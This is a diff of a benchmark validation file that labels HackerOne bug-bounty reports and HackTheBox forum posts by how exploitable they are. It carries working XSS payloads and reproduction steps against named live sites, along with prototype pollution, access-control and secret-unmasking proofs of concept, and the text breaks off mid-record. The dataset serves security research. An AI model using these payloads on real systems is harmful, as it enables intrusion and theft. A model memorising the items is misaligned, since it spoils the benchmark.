diff --git "a/benchmark/task4_hacker_exploit_labeling/val.jsonl" "b/benchmark/task4_hacker_exploit_labeling/val.jsonl" --- "a/benchmark/task4_hacker_exploit_labeling/val.jsonl" +++ "b/benchmark/task4_hacker_exploit_labeling/val.jsonl" @@ -1,1933 +1,1933 @@ -{"id": "9beec8bf1da61cf6e415", "text": "[Cross-site Scripting (XSS) - Stored] Stored Cross Site Scripting at http://www.grouplogic.com/ADMIN/store/index.cfm?fa=disprocode\n\n## Summary\nThe application exposes store ADMIN page at below URL and is accessible without authentication. \n```\nhttp://www.grouplogic.com/ADMIN/store/index.cfm\n```\nThe ADMIN page provides several functionalities. Among them the below functionality is found to be vulnerable to stored XSS.\n- View and Edit Promo Code (http://www.grouplogic.com/ADMIN/store/index.cfm?fa=disprocode)\n\n\n## Steps To Reproduce\n1. Navigate to below URL to access the store admin page without authentication.\n```\nhttp://www.grouplogic.com/ADMIN/store/index.cfm\n```\n2. Navigate to promo codes section. (http://www.grouplogic.com/ADMIN/store/index.cfm?fa=disprocode)\n3. Edit any promo code.\n4. Add any of below payload in the Promo Code field.\n```\nPayload 1:\n----------\n

XSS

\n\nPayload 2:\n----------\n\n```\n5. Click the Edit Promo Code Button to save modified the promo code.\n6. Navigating again to the promo code page, in case of payload 1, XSS string is rendered, hovering mouse over it triggers xss. In case of payload 2, as soon as the promo code page is opened, xss triggers.\n\n## Recommendations\nIt is highly recommended to implement output encoding. \nEncode the following characters with HTML entity encoding to prevent switching into any execution context, such as script, style, or event handlers. Using hex entities is recommended in the spec. The 5 characters significant in XML``` (&, <, >, \", ')```:\n\n```\n & --> &\n < --> <\n > --> >\n \" --> "\n ' --> '\n```\nReference: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html\n\n## Impact\n\nXSS can be used to :\n- Steal cookies, password\n- Website Defacement\n- Redirect Victim to Malicious site \n- Log keystrokes etc.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a465d9c454b279b4889c", "text": "[Cross-site Scripting (XSS) - Stored] RichText parser vulnerability in scheduled posts allows XSS\n\n## Summary:\nRichText parser is not filtering links when editing scheduled posts\n\n## Steps To Reproduce:\n\n 1. Create a new scheduled post with a link: {F2270188}\n 2. Intercept the request with Burp Suite/Other proxies and replace the link with javascript scheme payload: {{F2270195}\n 3. Navigate to scheduled posts and click Edit: {F2270203}\n 4. Observe the malicious link, if you click on it, the javascript will execute: {F2270204}\n\n## Root cause and possible ways leverage\nWhen submitting a scheduled post, API doesn't validate links, it happens only on the client side and the links can be forged with interception of requests. Though, it seems it is impossible to get the XSS in live post, when submitting the malicious post, reddit turns richtext to markdown and then to html, which automatically removes invalid links. Another possible way to bring it in real post, is to use Link type and also forge the link, but when submitting it will just give an error\n\n## Impact\n\nAttacker can trick admins to visit the scheduled editing page and click on malicious link, which results in XSS", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2b33415f5eb80e1809e4", "text": "[Cross-site Scripting (XSS) - Reflected] XSS Reflected - ███\n\nHi Team,\n\nI found a XSS Reflected.\n\n```\nhttps://██████/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)\n```\n\nThans DRauschkolb\n\n## Impact\n\nXSS vulnerabilities can be used to trick a web user into executing a malicious script, potentially revealing a user's web session information or modify web content & even steal cookies.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nhttps://█████/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)\n\n## Suggested Mitigation/Remediation Actions", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c309b4227baaa027fb5d", "text": "[Information Disclosure] [███████] Information disclosure due unauthenticated access to APIs and system browser functions\n\n**Description:**\nMultiple information exposure vulnerabilites were identified in a Jira Server instance (unauthenticated access to APIs and system browser functions). This report describes a combination of two separate vulnerabilities in two separate services This chain of vulnerabilities allows unauthenticated attacker to run arbitrary code on a server inside the company's internal network. the vulnerable registered as references JRASERVER-73060\n\n\n## References\nhttps://jira.atlassian.com/browse/JRASERVER-73060\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-14179\n\n## Impact\n\nUnauthorised access and the data should not be visible.\nProject categories, resolutions, and usernames are listed even if the API is not authenticated\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-14179\n\n## Steps to Reproduce\n1. Navigate visit the target scope is https://█████████/secure/JiraCreditsPage!default.jspa\n 1. And now we found a directory is jira sensitive\n 1. Lets send a curl request to the `?maxResults=1000` endpoint, as shown below. In the request, point the post request to the server address you want to send the request to:\n\nHere's the HTTP Parameter request that the issue:\n```\nGET /rest/menu/latest/admin HTTP/1.1\nHost: ███\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\nsec-ch-ua-platform: \"Mac OS\"\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\n```\n * https://██████/secure/JiraCreditsPage!default.jspa\n * https://███████/rest/menu/latest/admin?maxResults=1000\n\n## Suggested Mitigation/Remediation Actions\n## Workaround\nAnonymous access to endpoints listed below is restricted starting Jira 9.0. On future Jira 8.x releases and all LTS releases it is possible to restrict anonymous access with feature flags. On Jira 8.x to restrict anonymous access to the endpoint you need to disable feature flag aka provide ``.disabled On Jira 9.0 you need to enable the same feature flag aka provide ``.enabled\n\n\n**You can use given feature flags: **\n`/rest/api/2/projectCategory` - (Anonymous access disabled completely) \n`/rest/api/2/resolution` - (Anonymous access blocked only when there is no projects available for anonymous users) \n`/rest/menu/latest/admin` - There is currently no feature flag to disable anonymous access, please check linked ticket in \"duplicates by\" to track this problem.\n\n**Refferences**\nhttps://hackerone.com/reports/994612 \n[JRASERVER-73060](https://jira.atlassian.com/browse/JRASERVER-73060)", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2020-14179"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "31f836cb89ea1d7b3a6e", "text": "[Unknown] OTP reflecting in response sensitive data exposure leads to account take over\n\n## Summary:\nSensitive data that is otp is reflecting in the response of phone number otp verification in https://app.upchieve.org \n\n## Steps To Reproduce:\n\n\n 1. Signin with a account\n 2.After signin it will ask for phone number for otp verification.\n3.Capture the request using burpsuite and see the response \n4.Now otp is exposing in the response.\n5.Account take over is happening.\n\n## Impact\n\nAny attacker can login into user account with his/her otp verification which is a high impact of this website.sensitive data is exposing here", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4cde88042c5490fb4c2c", "text": "It probably will take forever if you’re using the /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt . Consider using wordlists that are using common names. If the wordlist is sorted alphabetically, the hit will be near the bottom…not a big fan of how long to wait on some of these assessments.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-01-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "87bd2662abb7d7dd7d18", "text": "[Modification of Assumed-Immutable Data (MAID)] Prototype pollution via console.table properties\n\n**Summary:**\n\nAttacker control of the second `properties` parameter of `console.table` may lead to prototype pollution.\n\n**Description:**\n\nDue to the formatting logic of the `console.table` function it is not safe to allow user controlled input to be passed to the `properties` parameter while simultaneously passing a plain object with at least one property as the first parameter.\n\nThe prototype pollution has very limited control, in that it only allows an empty string to be assigned numerical keys of the object prototype.\n\n## Steps To Reproduce:\n\nThe vulnerability can be reproduced in the Node.js REPL, tested with version `v16.7.0`:\n\n 1. Run the following: `console.table({foo: 'bar'}, ['__proto__'])`\n 2. Verify that the object prototype has been polluted: `Object.prototype[0] === ''`\n\nThe pollution will vary depending on the number of properties on the object passed as the first parameter, with each additional property assigning another incrementing index of the object prototype. This means that if the first parameter is also controlled by the attacker, it is possible to assign empty strings from `0..n` to the object prototype, for any `n`:\n\n```\n> console.table({a: 1, b: 1, c: 1}, ['__proto__'])\nUncaught TypeError: Cannot create property '0' on string ''\n\n> Object.prototype\n[Object: null prototype] { '0': '', '1': '', '2': '' }\n```\n\nThe vulnerable assignment can be found [here](https://github.com/nodejs/node/blob/3f7dabdfdc9e2a3cd3f92e377755c0dd43f6751b/lib/internal/console/constructor.js#L576) in the Node.js `console.table` implementation.\n\nA suggested remediation is to ignore `properties` named `'__proto__'`, or to use a different data structure to store the computed table fields. For example:\n\n```diff\n const keys = properties || ObjectKeys(item);\n for (const key of keys) {\n+ if (key === '__proto__') {\n+ continue\n+ }\n if (map[key] === undefined)\n map[key] = [];\n```\n\n## Impact:\n\nUsers of `console.table` have no reason to expect the danger of passing on user input to the second `properties` array, and may therefore do so without sanitation. In the even that for example a web server is exposed to this vulnerability, it is likely to be a very effective denial of service attack. In extremely rare cases the prototype pollution can lead to more severe attack vectors such as bypassing authorization mechanisms, although due to limited control of the pollution this is unlikely.\n\n## Supporting Material/References:\n\n * [CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')](https://cwe.mitre.org/data/definitions/1321.html)\n * [The vulnerable assignment](https://github.com/nodejs/node/blob/3f7dabdfdc9e2a3cd3f92e377755c0dd43f6751b/lib/internal/console/constructor.js#L576)\n\n## Impact\n\nUsers of `console.table` have no reason to expect the danger of passing on user input to the second `properties` array, and may therefore do so without sanitation. In the even that for example a web server is exposed to this vulnerability, it is likely to be a very effective denial of service attack. In extremely rare cases the prototype pollution can lead to more severe attack vectors such as bypassing authorization mechanisms, although due to limited control of the pollution this is unlikely.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "cf779b869d7149d0da5e", "text": "[Information Disclosure] Users querying dim_hacker_reports table through Analytics API can determine data from dim_reports table using WHERE or HAVING query\n\nThe query builder for the Analytics API is vulnerable to a confusion attack. The `dim_reports` and `dim_hacker_reports` tables both pull their data from the `Analytics::DimReport` model. When applying a `WHERE` clause or `HAVING` clause with a `FILTER` in the HackerOne Analytics Query Language (HAQL), an attacker can create references to columns outside of the HAQL table schema. Assume that there is a table looking as following:\n\n| report_id | is_triage_sla_missed |\n| --- | --- |\n| 27 | false |\n\nAnd the following two schema definitions:\n\n```ruby\n'dim_reports': {\n 'model': 'Analytics::DimReport',\n 'columns': {\n 'report_id': TYPE_NUMBER,\n 'is_triage_sla_missed': TYPE_BOOLEAN,\n }\n}\n```\n\n```\n'dim_hacker_reports': {\n 'model': 'Analytics::DimReport',\n 'columns': {\n 'report_id': TYPE_NUMBER,\n }\n}\n```\n\nThe `is_triage_sla_missed` column can only be queried through the `dim_reports` table, which reporters of a report do not have access to. However, when querying the `report_id` from either table, it results in the following SQL to being executed:\n\n```sql\nSELECT \n \"analytics\".\"dim_reports\".\"report_id\" AS dim_hacker_reports__report_id \nFROM \n \"analytics\".\"dim_reports\" \nWHERE \n (\n \"analytics\".\"dim_reports\".\"reporter_id\" = ?\n AND \"analytics\".\"dim_reports\".\"reporter_id\" IS NOT NULL\n ) \nLIMIT \n 1000 OFFSET 0\n```\n\nAs can be seen, there is no alias assigned to the `dim_reports` table. This can be used to confuse the query builder by using a reference to the `dim_reports` table, even though that table wasn't queried from. As an example:\n\n```\nquery {\n analytics(queries: [\n {\n select: [\n {\n field: dim_hacker_reports__report_id\n }\n ]\n from: dim_hacker_reports\n where: {\n predicates: [\n {\n left: {\n ref: dim_reports__is_triage_sla_missed\n }\n function: eq\n right: {\n boolean: false\n }\n }\n ]\n }\n }\n ]) {\n keys\n values\n }\n}\n```\n\nThe `dim_reports__is_triage_sla_missed` reference should fail to be used, because `dim_reports` isn't being selected from or joined into the query. However, it misses this check, allowing the column to be referenced even though it isn't present in the `dim_hacker_reports` schema. Based on whether the query returns the row, the value of the column can be obtained:\n\n**Data in column was guessed correctly**\n{F2107683}\n\n**Data in column does not match expectation**\n{F2107684}\n\n## Impact\n\nEven though there isn't any sensitive data that can be queried through the `dim_reports` table schema today, this may cause unauthorized access to sensitive data in the future.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bc508ef2ce1fbc21b4a8", "text": "[HTTP Request Smuggling] CVE-2022-32215 - HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding\n\nOriginal Report: https://hackerone.com/reports/1501679\n\n## Impact\n\nDepending on the specific web application, HRS can lead to cache poisoning, bypassing of security layers, stealing of credentials and so on.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-32215"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "89188dfe7452394d027f", "text": "[Time-of-check Time-of-use (TOCTOU) Race Condition] Promotion code can be used more than redemption limit.\n\n## Summary:\nWhile creating a promotion code a user can specify number of times that code can be redeemed.(i.e. Redemption limit)\n{F1962666}\nCodes aren't supposed to be redeemed more than the redemption limit.\nBut there exists a race condition that allows use of promotion codes more than redemption limit.\n{F1962665}\n\n## Steps To Reproduce:\n[In these steps i have used just a browser to show how easy this is to exploit and even a person with very limited knowledge on technology can exploit this. This can certainly be scaled using burp and other software .]\n\n1. As a merchant create a promotion code with Redemption limit 1.\n{F1962664}\n2. As a user, Visit any two payment links of same merchant with the coupon.\n3. In both payment links, Fill the form and apply coupon but don't hit Pay/ Subscribe.\n4.Hit both link's pay/subscribe button as fast as you can.\n5. Both payment will be successful using one coupon two times.\n\n## Supporting Material/References:\nI have added a video poc.\nIn this poc, I have used a promotion code with redemption limit 2.\nI have also used laptops screentouch feature to click both link's pay/subscribe button as fast as I could.\n{F1962525}\n\n## Impact\n\nPromotion code can be used more than redemption limit.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "85ed722c3a2872c88c2a", "text": "[Improper Access Control - Generic] Hide download previews are accessible without a watermark\n\nInitial report from https://github.com/nextcloud/richdocuments/issues/2561\n\n**Describe the bug**\nThe secure watermarked view announced for Nextcloud 25 / Hub 3 can be hacked. See reproduction steps below.\n\n**To Reproduce**\n\n1. Go to Nextcloud Office Admin Settings and set the watermark options to have a custom watermark in read-only shares, without a download button.\n2. For example, create a read-only public share link without a download button.\n3. Go to the created public URL and see that there is as expected a watermark on the read-only document and no download button. For now, everything is OK.\n4. Then notice that there is the close document cross at the top right. IMO, this cross should not exist because when you click on it, the document reappears behind, without the watermark. Even though the document appears smaller, I think this is risky and goes against the privacy purpose of this feature shown in Berlin.\n\n**Expected behavior**\nThe close button should not appear at the top right in order to keep the recipient of the share captive in this view of the document. I go further in my explanation by saying that if the share is a single file share and not a folder share, the close button should never appear, because the share recipient is not supposed to access an upstream folder, but just be able to view the file (and edit it if he has write permission), nothing else.\n\n**Screenshots**\nHere is the closing button : \n![2022-10-21_14-29](https://user-images.githubusercontent.com/33763786/197195931-1e55f569-de6c-4527-be30-6e584a847468.png)\nHere is what we get after clicking on it : \n![2022-10-21_14-39](https://user-images.githubusercontent.com/33763786/197197843-fb0eba78-17f7-4b71-8eca-0254b0e80af1.png)\n\n## Impact\n\nWhile the download should be hidden and the watermark should get applied the preview is still visible without", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "55af3f24e50e437b4f44", "text": "[Business Logic Errors] CVE-2023-23914: HSTS ignored on multiple requests\n\ncurl's HSTS functionality fail when multiple URLs are requested serially.\n\nUsing its HSTS support, curl can be instructed to use HTTPS instead of using an insecure clear-text HTTP step even when HTTP is provided in the URL. This HSTS mechanism would however suprisingly be ignored by subsequent transfers when done on the same command line because the state would not be properly carried on.\n\n## Impact\n\nBypass intended security control.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-23914"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9a428803c2bead3f393f", "text": "[Information Disclosure] Secrets can be unmasked in the \"Rendered Template\"\n\n## Affected versions\nApache Airflow before 2.7.1\n\n## How to reproduce\n\nGo to the `Rendered Template` page and in address line replace encoded symbols of `execution_date` parameter with decoded symbols. Page is still shown, but with credentials unmasked.\n\nSibling pages in contrast have different behavior: `K8s Pod Specs` shows oops page and ` Log` shows empty log when`execution_date` parameter is malformed\n\n## Example\n```\nnot masked - http://airflow.dev.local/rendered-templates?dag_id=tutorial_taskflow_api&task_id=extract&execution_date=2023-08-17T16%3A15%3A08.189107+00%3A00\nmasked - http://airflow.dev.local/rendered-templates?dag_id=tutorial_taskflow_api&task_id=extract&execution_date=2023-08-17T16%3A15%3A08.189107%2B00%3A00\n```\n\n{F2774937}\n{F2774939}\n\nExample dag code:\n```python\nimport json\n\nimport pendulum\n\nfrom airflow.decorators import dag, task\nfrom airflow.models import Variable\n@dag(\n schedule=None,\n start_date=pendulum.datetime(2023, 8, 17, tz=\"UTC\"),\n catchup=False,\n tags=[\"example\"],\n)\ndef tutorial_taskflow_api():\n\n @task()\n def extract(pwd):\n return pwd\n\n\n order_data = extract(pwd = Variable.get('secret_var'))\n print(order_data)\n\n\ntutorial_taskflow_api()\n```\n\nIn airflow UI variable with name `secret_var` should be added before trying\n\n## Impact\n\nAny user who can see a dag can get access to secret credentials used by this dag", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "5c5235e2baaa2fd56663", "text": "AES256-CTR Attack for CTF Challenge\n\nHello, I have a CTF challenge at my university and unfortunately I don’t know what to do next. Here are all the clues: I can enter my student ID and get a cipher text back. Flags have the format {f=XXX}, where XXX consists of 12 pseudo-random characters from the alphabet “0123456789abcdef”. Here is the code that calculates the cipher text: import os from Crypto.Cipher import AES def encrypt(msg): nonce = os.urandom(8) key = os.urandom(32) c = b'' for i in range((len(msg)//16)+1): aes = AES.new(key,AES.MODE_CTR, nonce = nonce) c +=aes.encrypt(msg[16*i:16*(i+1)]) return c plaintext = '''GET / HTTP/1.1\\r\\nHost: ctf.itsc.uni-xxx.de\\r\\nUser-Agent: Mozilla\\5.9 (X11; Ubuntu: Linux x86_64; rv:62.0) Gecko/20100101 Firefox/ 62.0\\r\\nAccept: text/html,application/xhtml+xml,application/xml;qU0.9,*/*;q=0.8\\r\\nAccept-Language: en-US,en;q=0.5\\r\\nAccept-Encoding: gzip, deflate, br\\r\\nConnection: keep-alive\\r\\nCookie: {{f={}}}'''.format(flag) ciphertext = encrypt(plaintext.encode()).hex() The encryption code was implemented in Python3 and the PyCryptoDome library. There is another note that you should pay particular attention to how the counter mode was implemented. Example for student ID 1950243 is the cipher text: cb581035f90f6091ba1e9857a25f081bc4723761ec0f4bb18860de12ff0d2b64e2746962a35f58a09c3ad60aa20a601c86483770a40269a28b20c35cac236a6be5712874f91a06f5ce66ef57bd552544ee682a61a31408898720c21eac163d27d32b702ef65d5effd87c9956a54e4274ef762b3ae41f19f5de7f8757ac286c63e97b2b6df9191aebde43bd27ef0d6061f8276461b3575cea863ada0aa00f7561e0742774a24647abc136df12e1022e69e1716874a65f44ac8d2fc30fe3002a69e1717f64eb1f06fcc264984cb71f3821a225491f974c4ba09e3a9a2aed006264ed7a212ff64a46e8bb1d9b03e255742cbc337118dc6e4ba68b3ec34bc900667ee8742a72ec0f4fbf873e9b46e80b637ded692139f64d5ac8e40dd808e20b6665e5722a2ff6444da09e63d60ae518601c865e2b7abd464dffce35d15bbf0c3025e8297624e11b19f393 I tried reversing the calculation but without the key I couldn’t find myself in much progress. I also tried analyzing the cipher texts and while I was able to find similarities, I can’t seem to find anything else. I am not particularly looking for the complete solution, rather some clues as to what I might be missing. I would be happy if anyone could point the way", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-11-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f4d74691e839e00128a5", "text": "[Misconfiguration] The `stripe/veneur` GitHub repository links to a domain `veneur.org`, which is not under stripe's control\n\nInitially reported at https://github.com/stripe/veneur/issues/1058. Since that report, the repository's sidebar has been updated to no longer link to the uncontrolled domain. Many of the 179 forks of this repository still contain the link to the uncontrolled domain.\n\n## Summary:\n- The github.com/stripe/veneur repository contains security-sensitive code which is designed to run within a company's private network, often as a sidecar on each of their application servers.\n- The repository's README and documentation does not contain instructions for installing veneur. Instead, it linked to an external domain, `https://veneur.org`, which contained those instructions.\n- The `https://veneur.org` domain appears to be no longer under Stripe's control.\n- If the website is not under Stripe's control, it is an easily exploitable vector for a phishing or supply chain contamination attack. The targets of this attack would be user's of the open source release of veneur (not specifically Stripe), and Stripe customers.\n- Example attack:\n - step one: control `https://veneur.org`, either because you are the current owner or you purchase the domain.\n - step two: recreate the old site, but edit the installation instructions to reference malicious source code or a docker image built with malicious code.\n - step three: a veneur user follows the instructions\n - outcome: attacker-controlled code/image running inside a privileged environment.\n- Example attack two:\n - step one: control `https://veneur.org`, either because you are the current owner or you purchase the domain.\n - step two: replace the contents of the website with a fake Stripe login screen.\n - step three: a veneur user, who is likely to also be a Stripe user, enters their username and password into the fake login screen.\n - outcome: attacker gains access to privileged credentials. Because the `https://veneur.org` website is linked to by an official, Stripe-controlled repository, there is a much greater likelihood that the attack will succeedd than if it had to operate on a different domain.\n\n## Steps To Reproduce:\n1. Visit https://github.com/stripe/veneur\n2. Click on the `https://veneur.org` link in the sidebar.\n\nSince I initially reported this issue in the Github repository, at https://github.com/stripe/veneur/issues/1058 , the sidebar has been edited to no longer link to `https://veneur.org`. Many of the 179 forks of this repository still contain the link to the uncontrolled domain.\n\n## Supporting Material/References:\n\nInitial report with images:\n- https://github.com/stripe/veneur/issues/1058\n\nThe link in the sidebar:\n- https://user-images.githubusercontent.com/824173/242777008-1e2b02af-be8c-484c-b131-842d570bdb89.png\n\nThe contents of the website currently:\n- https://user-images.githubusercontent.com/824173/242777079-12830e1c-7928-460c-81b0-26523062f510.png\n\n## Impact\n\nAn attacker can easily impersonate Stripe, taking advantage of the fact that this website is linked to by an official Stripe-owned web page. They can use this as the beginning of a phishing or a supply-chain contamination attack targeting Stripe's customers.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "60ede1e04e882b788f0b", "text": "[Cleartext Storage of Sensitive Information] Sensitive Information Disclosure Through Config File\n\n## Summary:\nAn attacker could gain access to sensitive information about usernames, encrypted passwords, internal IP addresses and configuration data of internal services.\n\n## Steps To Reproduce:\n- Go to https://zik.mtncameroon.net/common/queryconfig.action\n\n## Remediation\nConfigure the application to not reveal sensitive information to client.\n\n## References\nhttps://cwe.mitre.org/data/definitions/200.html\n\n## Impact\n\nA malicious user is able to gain sensitive information usernames, encrypted passwords, internal IP addresses and configuration data of internal services.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d39b78db8500498a2d4f", "text": "[Cross-site Scripting (XSS) - DOM] DOM XSS through ads\n\nMultiple ads hosted on www.urbandictionary.com make the www.urbandictionary.com origin vulnerable to DOM XSS. Attached is an image of `alert(document.domain)` executing. The injection works in Firefox and Chrome.\n\nVisiting the following URL will **probably** cause an alert box displaying the document.domain as www.urbandictionary.com.\n`https://www.urbandictionary.com/define.php?term=#asdf'-alert(document.domain)-'asdf`\n\nI say \"probably\" because the exploit depends on the loading of certain ads. Doing this from a fresh browser session usually causes the alert box. If not refreshing the page a few times, allowing the page to fully load, usually causes the pop-up. It all depends on which ad loads.\n\nIt appears the `pwt.js` JavaScript file uses the `displayCreative` function to display a unique ad. This apparently is done by executing `document.write` in an anonymous function to write the ad into the the www.urbandictionary.com page. Visiting the above link will cause one of the ads to execute `document.domain` with a string that contains the following:\n\n```\n\n```\n\n 2. Fill in your nickname in the Author form of the search function and wait for the search, it will automatically trigger a pop-up.\n\n{F1262581}\n\n## Recommendations\n\nAdd special character filtering to the nickname modification function of the forum.\n\n## Impact\n\nYou can add any keywords that users may use when searching for authors to your nickname to attack the corresponding users. It is possible to execute any Javascript.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "106ff62251227573b663", "text": "Hello there, Can you please give me a hint ? i tried: I am getting the message “Malicious request denied” but i cant find anywhere in the code the response for the “ls” or “whoami” command in order to continue further. Am i missing something ?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-08-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3bd41b470ee94567235b", "text": "[Unknown] [Java]: CWE-552 Add sources and sinks to detect unsafe getResource calls in Java EE applications\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c8ada0951b6e91c73073", "text": "[Unknown] Twitter Account hijack @nextcloudfrance\n\nBroken Link Hijacking (BLH) is a web-based attack where it exploits external links that are no longer valid. The attackers take over this expired, stale, and invalid external links on credible websites or web applications for malicious or fraudulent purposes.\n\nLink Hijacking attacks occur because the website/ web application continues to contain links to expired/ stale resources/pages (loaded using external URLs).\n\nSteps :\n\n1. Go to https://nextcloud.com/fr/\n\n2. Go to last and click on Twitter icon.\n\n3. It redirects you to the\n https://twitter.com/nextcloudfrance\n\n4. It gives 404 at first and i takeover the username for Testing Purpose .\n\n5. If you go to https://nextcloud.com/fr/ and click on Twitter Icon , now it redirect you to Attacker ( My ) Profile .\n\nThe best way to prevent Broken Link Hijacking attacks is to proactively identify such stale/ dead links and remove them from the website regularly. \n\nRef :\nhttps://hackerone.com/reports/1031321\nhttps://hackerone.com/reports/1607429\n\n## Impact\n\nSince the link can be hijacked so any attacker can claim the link and make fake twitter profile of Nextcloud and can do scam with them.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "112cffd34f498ccf3e0e", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS on https://███/████via hidden parameter \"█████████\"\n\nHi everyone :)\n\nI found a Reflected XSS on https://█████/█████████via hidden parameter \"██████████\".\n\n\n## Steps To Reproduce:\n\n- Use your favorite web browser\n- Go to : \n```\nhttps://█████/████████&██████=XXX%22%3E%3Cscript%3Ealert(%27Reflected%20XSS%20here%27)%3C/script%3E\n```\n\nAn XSS is triggered !\n\nThe initial page was https://██████/guest/tls_sso.php\n\nWith a little research, you can find a hidden parameter \"███\" which is directly reflected in the source code **without sanitize user entries**. Then just close the tag and inject our malicious code.\n\n## Supporting Material/References:\nWork on every browser (Firefox, Chrome ..)\n\n## Suggested Mitigation/Remediation Actions\n\n- Never trust user inputs, and therefore sanitize them.\n- If the parameter \"█████\" is useless in this page and in the authentication process, then it should be deleted.\n\n## Impact\n\nThe damages of a reflected XSS flaw are numerous: executing malicious javascript code, phishing, defacing ... We can also inject HTML code and mislead the user when displaying the web page.\n\nFrom [OWASP](https://owasp.org/www-community/attacks/xss/) :\n\n>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c61930e6740800d3f08c", "text": "[Cross-site Scripting (XSS) - Generic] yelp.com XSS ATO (via login keylogger, link Google account)\n\n# Summary:\nyelp.com reflects the content of the cookie `guvo` in the html returned to the user. In some cases this value is not properly escaped, leading to XSS. This can be combined with another issue where the backend does not properly parse the user supplied cookies and allows us to smuggle a `guvo` cookie inside a cookie named `yelpmainpaastacanary`. The `yelpmainpaastacanary` cookie can be set by including a URL query parameter `?canary=[Cookie value]` in any request to `*.yelp.com`.\n\nThis report shows how chaining this cookie XSS with a cookie parsing issue leads to persistent XSS in a victims 